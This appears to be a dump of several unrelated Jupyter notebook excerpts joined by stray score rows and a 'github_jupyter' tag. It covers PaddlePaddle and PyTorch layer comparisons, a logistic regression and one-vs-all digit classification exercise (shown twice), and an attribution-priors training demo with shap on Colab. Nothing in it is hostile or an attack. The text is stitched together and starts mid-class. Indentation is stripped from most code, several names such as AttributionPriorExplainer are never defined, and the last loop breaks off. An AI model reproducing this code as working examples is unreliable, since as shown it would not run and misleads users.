x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
class TorchModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv = torch.nn.Conv2d(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1)
self.bn = torch.nn.BatchNorm2d(12)
self.relu = torch.nn.ReLU()
self.maxpool = torch.nn.MaxPool2d(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
        x = self.conv(x)
        x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
paddle_model = PaddleModel()
torch_model = TorchModel()
print(paddle_model)
print(torch_model)
print("====paddle names====")
print(list(paddle_model.state_dict().keys()))
print("\n====torch names====")
print(list(torch_model.state_dict().keys()))
def clip_funny(x, minv, maxv):
midv = (minv + maxv) / 2.0
cond1 = paddle.logical_and(x > minv, x < midv)
cond2 = paddle.logical_and(x >= midv, x < maxv)
y = paddle.where(cond1, paddle.ones_like(x) * minv, x)
y = paddle.where(cond2, paddle.ones_like(x) * maxv, y)
return y
x = paddle.to_tensor([1, 2, 2.5, 2.6, 3, 3.5])
y = clip_funny(x, 2, 3)
print(y)
| 0.68658 | 0.506713 |
### Programming Exercise 2: Logistic Regression
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
```
### 1 Logistic Regression
```
!ls ../../2_logistic_regression/logistic_reg_new/
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, 0:2]
X = np.insert(X, 0, 1, axis=1)
y = data[:, -1]
m = y.shape[0]
```
#### 1.1 Visualizing the data
```
pos = np.where(y==1)
neg = np.where(y==0)
def plotData():
plt.figure(figsize=(10, 6))
plt.plot(X[pos][:, 1], X[pos][:, 2], 'k+', label='Admitted')
plt.plot(X[neg][:, 1], X[neg][:, 2], 'yo', label='Not Admitted')
# plt.grid(True)
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
plotData()
```
#### 1.2 Implementation
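The cell below implements the sigmoid hypothesis and the (optionally regularized) cost that computeCost evaluates:

$$
h_\theta(x) = \frac{1}{1 + e^{-\theta^{T} x}}, \qquad
J(\theta) = \frac{1}{m}\left[-y^{T}\log h_\theta(X) - (1-y)^{T}\log\bigl(1-h_\theta(X)\bigr) + \frac{\lambda}{2}\sum_{j\ge 1}\theta_j^{2}\right]
$$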
```
from scipy.special import expit # sigmoid function
myx = np.arange(-10, 10, .1)
plt.plot(myx, expit(myx))
plt.grid(True)
# Hypothesis function
def h(mytheta, myX):
return expit(np.dot(myX, mytheta))
# Cost function
def computeCost(mytheta, myX, myy, mylambda = 0.):
term1 = np.dot(-np.array(myy).T, np.log(h(mytheta, myX))) # y=1
term2 = np.dot((1-np.array(myy)).T, np.log(1-h(mytheta, myX))) # y=0
regterm = (mylambda/2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:]))
return float((1./m)*(np.sum(term1-term2)+regterm))
initial_theta = np.zeros((X.shape[1], 1))
computeCost(initial_theta, X, y)
from scipy import optimize
def optimizeTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.fmin(computeCost, x0=mytheta, args=(myX, myy, mylambda), maxiter=400, full_output=True)
return result[0], result[1]
theta, mincost = optimizeTheta(initial_theta, X, y)
print(computeCost(theta, X, y))
theta
boundary_xs = np.array([np.min(X[:, 1]), np.max(X[:, 1])])
boundary_ys = (-1/theta[2])*(theta[0]+theta[1]*boundary_xs)
plotData()
plt.plot(boundary_xs, boundary_ys, 'b-', label='Decision Boundary')
plt.legend()
print(h(theta, np.array([1, 45., 85.])))
def makePrediction(mytheta, myx):
return h(mytheta, myx) >= 0.5
pos_correct = float(np.sum(makePrediction(theta, X[pos])))
neg_correct = float(np.sum(np.invert(makePrediction(theta, X[neg]))))
tot = X[pos].shape[0]+X[neg].shape[0]
prcnt_correct = float(pos_correct+neg_correct)/tot
print('training set correctly predicted %f' % prcnt_correct)
```
### 2 Regularized Logistic Regression
#### 2.1 Visualizing the data
```
cols = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data2.txt', delimiter=',', usecols=(0, 1, 2), unpack=True)
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size
X = np.insert(X, 0, 1, axis=1)
pos = np.array([X[i] for i in range(X.shape[0]) if y[i]==1]) # np[np.where(y==1)]
neg = np.array([X[i] for i in range(X.shape[0]) if y[i]==0])
def plotData():
plt.plot(pos[:, 1], pos[:, 2], 'k+', label='y=1')
plt.plot(neg[:, 1], neg[:, 2], 'yo', label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
# plt.grid(True)
plt.figure(figsize=(8, 8))
plotData()
```
#### 2.2 Feature mapping
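mapFeature below expands the two raw scores into every polynomial term up to the requested degree (degree 6 is used here), so the decision boundary can be non-linear:

$$
\text{mapFeature}(x_1, x_2) = \bigl[\,1,\; x_1,\; x_2,\; x_1^{2},\; x_1 x_2,\; x_2^{2},\; \dots,\; x_1 x_2^{5},\; x_2^{6}\,\bigr],
$$

i.e. all terms $x_1^{\,i-j} x_2^{\,j}$ for $1 \le i \le 6$, $0 \le j \le i$.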
```
def mapFeature(degrees,x1col, x2col):
# degrees = 2
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1*term2).reshape(term1.shape[0], 1)
out = np.hstack((out, term))
return out
mappedX = mapFeature(6, X[:, 1], X[:, 2])
mappedX.shape
initial_theta = np.zeros((mappedX.shape[1], 1))
computeCost(initial_theta, mappedX, y)
def optimizeRegularizedTheata(mytheta, myX, myy, mylambda=0.):
result = optimize.minimize(computeCost, mytheta, args=(myX, myy, mylambda), method='BFGS', options={'maxiter':500,'disp':False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheata(initial_theta, mappedX, y)
mincost
```
#### 2.4 Plotting the decision boundary
```
def plotBoundary(mytheta, myX, myy, mylambda=0.):
theta, mincost = optimizeRegularizedTheata(mytheta, myX, myy, mylambda)
xvals = np.linspace(-1, 1.5, 50)
yvals = np.linspace(-1, 1.5, 50)
zvals = np.zeros((len(xvals), len(yvals)))
for i in range(len(xvals)):
for j in range(len(yvals)):
myfeaturesij = mapFeature(6, np.array([xvals[i]]), np.array([yvals[j]]))
zvals[i][j] = np.dot(theta, myfeaturesij.T)
zvals = zvals.T
u, v= np.meshgrid(xvals, yvals)
mycontour = plt.contour(xvals, yvals, zvals, [0])
myfmt = {0:'Lambda = %d' % mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
plt.figure(figsize=(12, 10))
plt.subplot(221)
plotData()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plotData()
plotBoundary(theta, mappedX, y, 1.)
```
### 3. Logistic Regression with sklearn
```
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, :-1]
y = data[:, -1]
# Shuffle the data when splitting, because the labels in this dataset are ordered
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# Standardize the features (fit the scaler on the training set only)
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
model = LogisticRegression()
model.fit(X_train, y_train)
# Make predictions on the test set
y_pred = model.predict(X_test)
print('Prediction accuracy: %f' % np.mean(np.float64(y_pred==y_test) * 100))
```
### 4. Logistic Regression with One-vs-All (handwritten digits)
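In the one-vs-all scheme implemented below, one regularized logistic classifier is trained per digit class, and a sample is assigned to the class whose classifier outputs the highest probability:

$$
\hat{y}(x) = \arg\max_{c \in \{0,\dots,9\}} h_{\theta^{(c)}}(x)
$$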
```
def display_data(imgData):
sum = 0
    pad = 1  # padding (separator line) between digit tiles
    display_array = -np.ones((pad + 10 * (20 + pad), pad + 10 * (20 + pad))) # (211, 211)
    """
    The nested loop below may look complicated, but it is simple: it copies
    the pixels of each digit into the display_array defined above, and the
    whole array is then shown with plt.imshow.
    """
for i in range(10):
for j in range(10):
display_array[pad + i * (20 + pad):pad + i * (20 + pad) + 20,
pad + j * (20 + pad):pad + j * (20 + pad) + 20] \
= (imgData[sum, :].reshape(20, 20, order="F"))
sum += 1
plt.imshow(display_array, cmap='gray')
# plt.axis('off')
# plt.figure(figsize=(12, 12))
plt.show()
def oneVsAll(X, y, num_labels, Lambda):
m, n = X.shape
    all_theta = np.zeros((n+1, num_labels)) # add a row for theta0 (the bias term)
X = np.insert(X, 0, 1, axis=1)
class_y = np.zeros((m, num_labels))
initial_theta = np.zeros((n+1, 1))
for i in range(num_labels):
class_y[:, i] = np.int32(y==i).reshape(1, -1) # 0 -> 1000000000
    # compute theta for each class
for i in range(num_labels):
result = optimize.fmin_bfgs(computeCost, initial_theta, fprime=gradient, args=(X, class_y[:, i], Lambda))
all_theta[:, i] = result.reshape(1, -1)
all_theta = all_theta.T
return all_theta
def gradient(initial_theta, X, y, initial_Lambda):
m = len(y)
h = sigmoid(np.dot(X, initial_theta.T))
theta1 = initial_theta.copy()
theta1[0] = 0
grad = np.zeros((initial_theta.shape[0]))
    grad = np.dot(np.transpose(X), h-y)/m + initial_Lambda/m * theta1
return grad
def predict_oneVsAll(all_theta, X):
m = X.shape[0]
num_labels = all_theta.shape[0]
p = np.zeros((m, 1))
X = np.insert(X, 0, 1, axis=1)# X = np.hstack((np.ones((m, 1)), X))
h = sigmoid(np.dot(X, all_theta.T))
p = np.array(np.where(h[0, :]==np.max(h, axis=1)[0]))
for i in range(1, m):
t = np.array(np.where(h[i, :]==np.max(h, axis=1)[i]))
p = np.vstack((p, t))
return p
def sigmoid(z):
h = np.zeros((len(z), 1))
h = 1.0/(1.0+np.exp(-z))
return h
import scipy.io as spio
# use scipy.io to read the .mat file
data = spio.loadmat('../../2_logistic_regression/logistic_reg_new/data_digits.mat')
X = data['X']
y = data['y']
m, n = X.shape # (5000, 400): feature: 20px*20px; training set: 5000
num_labels = 10 # 0, 1, 2, 3,...9
# randomly display 100 digit images
rand_indices = [np.random.randint(0, m) for x in range(100)]
# X[rand_indices, :] selects the 100 random rows
display_data(X[rand_indices, :])
Lambda = 0.1
all_theta = oneVsAll(X, y, num_labels, Lambda)
p = predict_oneVsAll(all_theta, X)
print('Prediction accuracy: %f%%' % np.mean(np.float64(p == y.reshape(-1, 1))*100))
```
### 5. OneVsAll with sklearn
```
X = data['X']
y = data['y']
y = np.ravel(y)
model = LogisticRegression()
model.fit(X, y)
p = model.predict(X)
print('Prediction accuracy: %f%%' % np.mean(np.float64(p==y) * 100))
```
|
github_jupyter
|
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
!ls ../../2_logistic_regression/logistic_reg_new/
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, 0:2]
X = np.insert(X, 0, 1, axis=1)
y = data[:, -1]
m = y.shape[0]
pos = np.where(y==1)
neg = np.where(y==0)
def plotData():
plt.figure(figsize=(10, 6))
plt.plot(X[pos][:, 1], X[pos][:, 2], 'k+', label='Admitted')
plt.plot(X[neg][:, 1], X[neg][:, 2], 'yo', label='Not Admitted')
# plt.grid(True)
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
plotData()
from scipy.special import expit # sigmoid function
myx = np.arange(-10, 10, .1)
plt.plot(myx, expit(myx))
plt.grid(True)
# Hypothesis function
def h(mytheta, myX):
return expit(np.dot(myX, mytheta))
# Cost function
def computeCost(mytheta, myX, myy, mylambda = 0.):
term1 = np.dot(-np.array(myy).T, np.log(h(mytheta, myX))) # y=1
term2 = np.dot((1-np.array(myy)).T, np.log(1-h(mytheta, myX))) # y=0
regterm = (mylambda/2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:]))
return float((1./m)*(np.sum(term1-term2)+regterm))
initial_theta = np.zeros((X.shape[1], 1))
computeCost(initial_theta, X, y)
from scipy import optimize
def optimizeTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.fmin(computeCost, x0=mytheta, args=(myX, myy, mylambda), maxiter=400, full_output=True)
return result[0], result[1]
theta, mincost = optimizeTheta(initial_theta, X, y)
print(computeCost(theta, X, y))
theta
boundary_xs = np.array([np.min(X[:, 1]), np.max(X[:, 1])])
boundary_ys = (-1/theta[2])*(theta[0]+theta[1]*boundary_xs)
plotData()
plt.plot(boundary_xs, boundary_ys, 'b-', label='Decision Boundary')
plt.legend()
print(h(theta, np.array([1, 45., 85.])))
def makePrediction(mytheta, myx):
return h(mytheta, myx) >= 0.5
pos_correct = float(np.sum(makePrediction(theta, X[pos])))
neg_correct = float(np.sum(np.invert(makePrediction(theta, X[neg]))))
tot = X[pos].shape[0]+X[neg].shape[0]
prcnt_correct = float(pos_correct+neg_correct)/tot
print('training set correctly predicted %f' % prcnt_correct)
cols = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data2.txt', delimiter=',', usecols=(0, 1, 2), unpack=True)
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size
X = np.insert(X, 0, 1, axis=1)
pos = np.array([X[i] for i in range(X.shape[0]) if y[i]==1]) # np[np.where(y==1)]
neg = np.array([X[i] for i in range(X.shape[0]) if y[i]==0])
def plotData():
plt.plot(pos[:, 1], pos[:, 2], 'k+', label='y=1')
plt.plot(neg[:, 1], neg[:, 2], 'yo', label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
# plt.grid(True)
plt.figure(figsize=(8, 8))
plotData()
def mapFeature(degrees,x1col, x2col):
# degrees = 2
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1*term2).reshape(term1.shape[0], 1)
out = np.hstack((out, term))
return out
mappedX = mapFeature(6, X[:, 1], X[:, 2])
mappedX.shape
initial_theta = np.zeros((mappedX.shape[1], 1))
computeCost(initial_theta, mappedX, y)
def optimizeRegularizedTheata(mytheta, myX, myy, mylambda=0.):
result = optimize.minimize(computeCost, mytheta, args=(myX, myy, mylambda), method='BFGS', options={'maxiter':500,'disp':False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheata(initial_theta, mappedX, y)
mincost
def plotBoundary(mytheta, myX, myy, mylambda=0.):
theta, mincost = optimizeRegularizedTheata(mytheta, myX, myy, mylambda)
xvals = np.linspace(-1, 1.5, 50)
yvals = np.linspace(-1, 1.5, 50)
zvals = np.zeros((len(xvals), len(yvals)))
for i in range(len(xvals)):
for j in range(len(yvals)):
myfeaturesij = mapFeature(6, np.array([xvals[i]]), np.array([yvals[j]]))
zvals[i][j] = np.dot(theta, myfeaturesij.T)
zvals = zvals.T
u, v= np.meshgrid(xvals, yvals)
mycontour = plt.contour(xvals, yvals, zvals, [0])
myfmt = {0:'Lambda = %d' % mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
plt.figure(figsize=(12, 10))
plt.subplot(221)
plotData()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plotData()
plotBoundary(theta, mappedX, y, 1.)
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, :-1]
y = data[:, -1]
# Shuffle the data when splitting, because the labels in this dataset are ordered
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# Standardize the features (fit the scaler on the training set only)
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
model = LogisticRegression()
model.fit(X_train, y_train)
# Make predictions on the test set
y_pred = model.predict(X_test)
print('Prediction accuracy: %f' % np.mean(np.float64(y_pred==y_test) * 100))
def display_data(imgData):
sum = 0
    pad = 1  # padding (separator line) between digit tiles
    display_array = -np.ones((pad + 10 * (20 + pad), pad + 10 * (20 + pad))) # (211, 211)
    """
    The nested loop below may look complicated, but it is simple: it copies
    the pixels of each digit into the display_array defined above, and the
    whole array is then shown with plt.imshow.
    """
for i in range(10):
for j in range(10):
display_array[pad + i * (20 + pad):pad + i * (20 + pad) + 20,
pad + j * (20 + pad):pad + j * (20 + pad) + 20] \
= (imgData[sum, :].reshape(20, 20, order="F"))
sum += 1
plt.imshow(display_array, cmap='gray')
# plt.axis('off')
# plt.figure(figsize=(12, 12))
plt.show()
def oneVsAll(X, y, num_labels, Lambda):
m, n = X.shape
    all_theta = np.zeros((n+1, num_labels)) # add a row for theta0 (the bias term)
X = np.insert(X, 0, 1, axis=1)
class_y = np.zeros((m, num_labels))
initial_theta = np.zeros((n+1, 1))
for i in range(num_labels):
class_y[:, i] = np.int32(y==i).reshape(1, -1) # 0 -> 1000000000
    # compute theta for each class
for i in range(num_labels):
result = optimize.fmin_bfgs(computeCost, initial_theta, fprime=gradient, args=(X, class_y[:, i], Lambda))
all_theta[:, i] = result.reshape(1, -1)
all_theta = all_theta.T
return all_theta
def gradient(initial_theta, X, y, initial_Lambda):
m = len(y)
h = sigmoid(np.dot(X, initial_theta.T))
theta1 = initial_theta.copy()
theta1[0] = 0
grad = np.zeros((initial_theta.shape[0]))
    grad = np.dot(np.transpose(X), h-y)/m + initial_Lambda/m * theta1
return grad
def predict_oneVsAll(all_theta, X):
m = X.shape[0]
num_labels = all_theta.shape[0]
p = np.zeros((m, 1))
X = np.insert(X, 0, 1, axis=1)# X = np.hstack((np.ones((m, 1)), X))
h = sigmoid(np.dot(X, all_theta.T))
p = np.array(np.where(h[0, :]==np.max(h, axis=1)[0]))
for i in range(1, m):
t = np.array(np.where(h[i, :]==np.max(h, axis=1)[i]))
p = np.vstack((p, t))
return p
def sigmoid(z):
h = np.zeros((len(z), 1))
h = 1.0/(1.0+np.exp(-z))
return h
import scipy.io as spio
# use scipy.io to read the .mat file
data = spio.loadmat('../../2_logistic_regression/logistic_reg_new/data_digits.mat')
X = data['X']
y = data['y']
m, n = X.shape # (5000, 400): feature: 20px*20px; training set: 5000
num_labels = 10 # 0, 1, 2, 3,...9
# randomly display 100 digit images
rand_indices = [np.random.randint(0, m) for x in range(100)]
# X[rand_indices, :] selects the 100 random rows
display_data(X[rand_indices, :])
Lambda = 0.1
all_theta = oneVsAll(X, y, num_labels, Lambda)
p = predict_oneVsAll(all_theta, X)
print('Prediction accuracy: %f%%' % np.mean(np.float64(p == y.reshape(-1, 1))*100))
X = data['X']
y = data['y']
y = np.ravel(y)
model = LogisticRegression()
model.fit(X, y)
p = model.predict(X)
print('Prediction accuracy: %f%%' % np.mean(np.float64(p==y) * 100))
| 0.382949 | 0.968411 |
# Setting for Colab
Edit -> Notebook settings -> Hardware accelerator -> GPU
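A quick sanity check that the GPU runtime is actually active; this is a minimal sketch and assumes PyTorch is available in the Colab runtime (it is preinstalled by default):
```
import torch
# Should print True once the GPU runtime has been enabled
print(torch.cuda.is_available())
```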
```
dir_of_file='MyDrive/Colab Notebooks/attributionpriors/examples'
from google.colab import drive
import os
drive.mount('./gdrive')
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
# Change the current working directory
os.chdir('./gdrive/'+dir_of_file)
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
import pkg_resources
if 'shap' not in [i.key for i in pkg_resources.working_set]:
!pip install shap
```
# Import library
```
import sys
sys.path.insert(0, '../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import altair as alt
import torch
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataset import random_split
import torchvision
from torchvision import transforms
import shap
```
# Demo
```
class BinaryData(Dataset):
def __init__(self, X, y=None, transform=None):
self.X=X
self.y=y
self.transform=transform
def __len__(self):
return len(self.X)
def __getitem__(self, index):
sample=self.X[index,:]
if self.transform is not None:
sample=self.transform(sample)
if self.y is not None:
return sample, self.y[index]
else:
return sample
batch_size=64
a_train=torch.empty(1000,1).uniform_(0,1)
x_train=torch.bernoulli(a_train)
x_train=torch.cat([x_train,x_train],axis=1)
y_train=x_train[:,0]
train_dataset=BinaryData(x_train, y_train)
train_loader=DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
#a_test=torch.empty(1000,2).uniform_(0,1)
#x_test=torch.bernoulli(a_test)
#y_test=x_test[:,0]
#test_dataset=BinaryData(x_test, y_test)
#test_loader=DataLoader(dataset=test_dataset, batch_size=64, shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
def calculate_dependence(model):
zero_arange=torch.tensor(np.concatenate([np.zeros(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
one_arange=torch.tensor(np.concatenate([np.ones(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
arange_zero=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.zeros(100).reshape(-1,1)],axis=1)).float().to(device)
arange_one=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.ones(100).reshape(-1,1)],axis=1)).float().to(device)
dep1=(model(one_arange)-model(zero_arange)).mean().detach().cpu().numpy().reshape(-1)[0]
dep2=(model(arange_one)-model(arange_zero)).mean().detach().cpu().numpy().reshape(-1)[0]
return dep2/dep1, dep1, dep2
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, None, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1), convergence_list1,label=k+1)
plt.xlim([40,75])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('epochs')
plt.ylabel('fractional dependence on feature 2')
plt.show()
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1)*(k+1), convergence_list1,label=k+1)
plt.xlim([0,350])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('gradient calls per training example')
plt.ylabel('fractional dependence on feature 2')
plt.show()
```
# example_usage
```
feature_mean=0
feature_sigma=1
dummy_sigma=0.5
n_samples=1000
n_features=3
X=np.random.randn(n_samples,n_features)*feature_sigma+feature_mean
X[:,2]=X[:,0]+np.random.randn(n_samples)*dummy_sigma
output_mean=0
output_sigma=0.5
Y=X[:,0]-X[:,1]+np.random.randn(n_samples)*output_sigma+output_mean
Y=Y.reshape([Y.shape[0],1])
data = pd.DataFrame({'Feature 0': X[:, 0], 'Feature 1': X[:, 1], 'Feature 2': X[:, 2], 'Outcome': Y.squeeze()})
alt.Chart(data).mark_point(filled=True).encode(
x=alt.X(alt.repeat('column'), type='quantitative', scale=alt.Scale(domain=[-4, 4])),
y=alt.Y('Outcome:Q', scale=alt.Scale(domain=[-6, 6]))
).properties(
height=200,
width=200
).repeat(
column=['Feature 0', 'Feature 1', 'Feature 2']
).properties(
title='The relationship between the outcome and the three features in our simulated data'
).configure_axis(
labelFontSize=15,
labelFontWeight=alt.FontWeight('lighter'),
titleFontSize=15,
titleFontWeight=alt.FontWeight('normal')
).configure_title(
fontSize=18
)
class CustomDataset(Dataset):
def __init__(self, x, y=None):
self.x=x
self.y=y
def __len__(self):
return len(self.x)
def __getitem__(self, index):
if self.y is not None:
return self.x[index], self.y[index]
else:
return self.x[index]
batch_size=20
dataset=CustomDataset(x=X,y=Y)
train_dataset, test_dataset, valid_dataset=random_split(dataset, [int(n_samples*0.8), int(n_samples*0.1), int(n_samples*0.1)])
train_dataloader=DataLoader(dataset=train_dataset, batch_size=20, shuffle=True, drop_last=True)
test_dataloader=DataLoader(dataset=test_dataset, batch_size=len(test_dataset), shuffle=True, drop_last=True)
valid_dataloader=DataLoader(dataset=valid_dataset, batch_size=len(valid_dataset), shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
class CustomModel(torch.nn.Module):
def __init__(self):
super(CustomModel,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(n_features,5),
torch.nn.ReLU(),
torch.nn.Linear(5,1))
def forward(self, x):
return self.layers(x)
```
## train with an attribution prior
```
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset[:][0], None, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset[:][0], None, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true) + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
```
### using shap.GradientExplainer
```
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
```
### using implemented explainer
```
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
```
## train without an attribution prior
```
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset, input_index=0, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset, input_index=0, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true)# + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
